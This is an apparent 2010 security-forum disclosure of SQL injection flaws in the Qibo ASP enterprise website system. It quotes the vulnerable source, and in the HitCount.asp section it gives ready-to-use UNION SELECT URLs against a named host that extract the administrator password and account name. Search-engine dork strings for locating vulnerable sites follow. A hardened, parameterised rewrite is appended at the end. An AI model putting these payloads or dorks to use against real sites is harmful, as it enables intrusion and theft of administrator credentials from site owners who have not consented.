Qibo enterprise website management system 0day

Source: Internet
Author: User

Release date: 2010-04-19
Author: Lan3a
Affected Versions: All
Vulnerability description:
The programs include anti-injection code, in the NoSql.asp file:

<%
If EnableStopInjection = True Then
    Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
    ' Blacklisted tokens, separated by "|"
    Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
    Fy_Inf = Split(Fy_In, "|")
    ' Check every POSTed form field against the blacklist
    If Request.Form <> "" Then
        For Each Fy_Post In Request.Form
            For Fy_Xh = 0 To UBound(Fy_Inf)
                If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
                    Response.Write ""
                    Response.End
                End If
            Next
        Next
    End If
    ' Check every query-string parameter against the blacklist
    If Request.QueryString <> "" Then
        For Each Fy_Get In Request.QueryString
            For Fy_Xh = 0 To UBound(Fy_Inf)
                If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh)) <> 0 Then
                    Response.Write ""
                    Response.End
                End If
            Next
        Next
    End If
End If
%>

The cookie is not filtered, but the program limits the integer type when passing in the variable, so I cannot.

Continue.

MemberLogin.asp

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, SQL
LoginName = Trim(Request.Form("LoginName"))
LoginPassword = Md5(Request.Form("LoginPassword"))
Set rs = Server.CreateObject("ADODB.RecordSet")
' LoginName goes straight into the SQL string
SQL = "select * from Qianbo_Members where MemName = '" & LoginName & "'"

The anti-injection code is not added here, but this is the login verification page. If the database is MSSQL, more can be done with it.

We then found that the HitCount.asp file does not call the anti-injection code.

<%
Dim rs, m_SQL
Dim m_ID
' ReplaceBadChar is applied, but the NoSql.asp anti-injection code is not called
m_ID = ReplaceBadChar(Request.QueryString("id"))
m_LX = ReplaceBadChar(Request.QueryString("LX"))
action = ReplaceBadChar(Request.QueryString("action"))
If action = "count" Then
    ' m_LX and m_ID are concatenated into the SQL text
    conn.Execute("update " & m_LX & " set ClickNumber = ClickNumber + 1 where ID = " & m_ID & "")
Else
    m_SQL = "select ClickNumber from " & m_LX & " where ID = " & m_ID
    Set rs = conn.Execute(m_SQL)
    Response.Write "document.write(" & rs(0) & ");"
    rs.Close
    Set rs = Nothing
End If
%>

This is the file. Let's construct the injection statement, as follows:

http://blog.cfyhack.cn/hitcount.asp?Lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin
(gets the admin password)

http://blog.cfyhack.cn/hitcount.asp?Lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin
(gets the management account)

Keywords:

inurl:Search.asp?Range=Product&Keyword=
inurl:ProductBuy.asp?ProductNo=
 


This problem also exists on the official website.
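
A hardened form of the HitCount.asp logic shown above, as an added example that is not Qibo's code: the table name is checked against a fixed allowlist, the id must be digits only, and the id is bound as an ADO parameter instead of being concatenated. It assumes conn is the open ADODB.Connection the original file uses; Qianbo_product is a hypothetical allowlist entry, and the helper names IsDigits and Reject are introduced here.

```asp
<%
' Added example, not Qibo's code. Assumes conn is the open ADODB.Connection
' that the original HitCount.asp already uses.
Const adCmdText = 1, adInteger = 3, adParamInput = 1
Dim allowed, tableName, idText, action, cmd, rs

' A table name cannot be a bound parameter, so LX must match a fixed allowlist.
' Qianbo_about is from the page; Qianbo_product is a hypothetical second entry.
Set allowed = Server.CreateObject("Scripting.Dictionary")
allowed.CompareMode = 1 ' vbTextCompare: case-insensitive keys
allowed.Add "Qianbo_about", "Qianbo_about"
allowed.Add "Qianbo_product", "Qianbo_product"

tableName = Trim(Request.QueryString("LX"))
idText = Trim(Request.QueryString("id"))
action = Request.QueryString("action") ' only compared, never put into SQL
If Not allowed.Exists(tableName) Then Reject
If Not IsDigits(idText) Then Reject
tableName = allowed(tableName) ' use the stored spelling, not the request's

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(idText))
If action = "count" Then
    cmd.CommandText = "update [" & tableName & "] set ClickNumber = ClickNumber + 1 where ID = ?"
    cmd.Execute
Else
    cmd.CommandText = "select ClickNumber from [" & tableName & "] where ID = ?"
    Set rs = cmd.Execute
    If Not rs.EOF Then
        ' CLng keeps the value written into the script numeric
        If Not IsNull(rs(0)) Then Response.Write "document.write(" & CLng(rs(0)) & ");"
    End If
    rs.Close
    Set rs = Nothing
End If
Set cmd = Nothing

Function IsDigits(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$" ' 1 to 9 digits always fits in CLng
    IsDigits = re.Test(s)
End Function

Sub Reject()
    Response.Status = "400 Bad Request"
    Response.End
End Sub
%>
```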
